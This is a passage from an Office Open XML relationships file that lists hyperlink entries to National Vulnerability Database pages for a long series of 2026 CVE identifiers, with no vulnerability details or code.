Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76163" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76442" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77692" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79651" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80274" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81265" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81563" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81634" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81665" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81736" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84543" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84544" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84549" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84563" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84598" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84629" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84997" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85189" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85190" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85191" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85195" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86108" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86109" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86894" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86895" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86904" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88852" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88853" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89028" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89063" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89863" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89897" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89968" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89971" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89974" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92128" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92129" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92577" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92594" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92599" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92625" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92626" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92719" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92784" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92791" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92792" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92794" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92815" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9336" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20222" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42784" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61590" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61592" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85152" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89157" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56839" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61409" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64752" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71179" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78135" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79643" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79691" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84611" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84632" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85386" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89910" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92399" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92406" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92718" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17526" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18595" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27560" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27561" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27562" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27563" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27564" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76424" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80127" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81468" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87024" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87976" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92469" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12756" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13107" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13275" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13285" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13287" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19248" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20300" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20683" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40856" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61596" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61598" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61915" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73175" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73462" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73468" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80380" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84548" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84565" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8821" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89792" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89818" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89826" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89838" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89840" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89912" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89927" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90016" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90017" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90555" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90927" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91197" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92299" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92456" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92459" TargetMode="External" Id="rId777" /><Relationship 